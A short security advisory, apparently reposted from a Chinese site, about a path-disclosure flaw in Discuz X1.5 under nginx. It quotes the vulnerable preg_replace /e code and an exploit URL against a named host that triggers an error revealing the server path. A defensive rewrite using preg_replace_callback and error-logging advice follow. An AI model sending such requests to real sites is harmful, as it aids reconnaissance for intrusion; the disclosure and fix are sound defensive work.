Discuz 1.5 with NGINX secondary-parsing path disclosure bug - vulnerability warning - the black bar safety net

2011-09-01T00:00:00
ID MYHACK58:62201131753
Type myhack58
Reporter Anonymous
Modified 2011-09-01T00:00:00

Description

Author: Sunny small cast

Test environment: Discuz X1.5 + nginx 1.0. Vulnerable file: source/function/function_core.php, in this code:

$_G['setting']['domain']['app']['default'] && $content = preg_replace("/<a href=\"([^\"]+)\"/e", "rewriteoutput('site_default', 0, '".$_G['setting']['domain']['app']['default'].$port.$_G['siteroot']."', '\\1')", $content);

Exploit code:

http://www.badguest.cn/forum.php/admin.php’/DDDDDDD.php

At the bottom of the page you can see an error that discloses the absolute path.
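
A hardened form of the replacement above, as an added example that is not from the original advisory or the Discuz code base. With the /e modifier the whole replacement string is compiled as PHP, so every value concatenated into it becomes source code; preg_replace_callback keeps those values as data. The rewriteoutput() stub body, the rewrite_links() name and the sample values are assumptions.

```php
<?php
// Added example, not Discuz code. rewriteoutput() is a stand-in stub that
// takes the same four arguments as the call on the page; its body is assumed.
function rewriteoutput($type, $returntype, $host, $href) {
    $url = $host . ltrim($href, '/');
    return '<a href="' . htmlspecialchars($url, ENT_QUOTES) . '"';
}

// Hypothetical helper: same pattern as the page's code, without the /e modifier.
function rewrite_links($content, $domain, $port, $siteroot) {
    // These values stay ordinary strings; they are never parsed as PHP source,
    // so a quote inside them cannot produce a parse error in evaluated code.
    $host = $domain . $port . $siteroot;

    return preg_replace_callback(
        '/<a href="([^"]+)"/',
        function ($m) use ($host) {
            // $m[1] is the captured href, passed as a plain argument.
            return rewriteoutput('site_default', 0, $host, $m[1]);
        },
        $content
    );
}

// Constructed input: a siteroot value containing a quote character.
$siteroot = "/forum.php/admin.php'/";
$html     = '<a href="forum.php?mod=viewthread&tid=1">thread</a>';

echo rewrite_links($html, 'bbs.example.com', '', $siteroot), "\n";
```

Independently of the code change, running production sites with display_errors off and errors sent to a log keeps filesystem paths in PHP error messages from reaching the client.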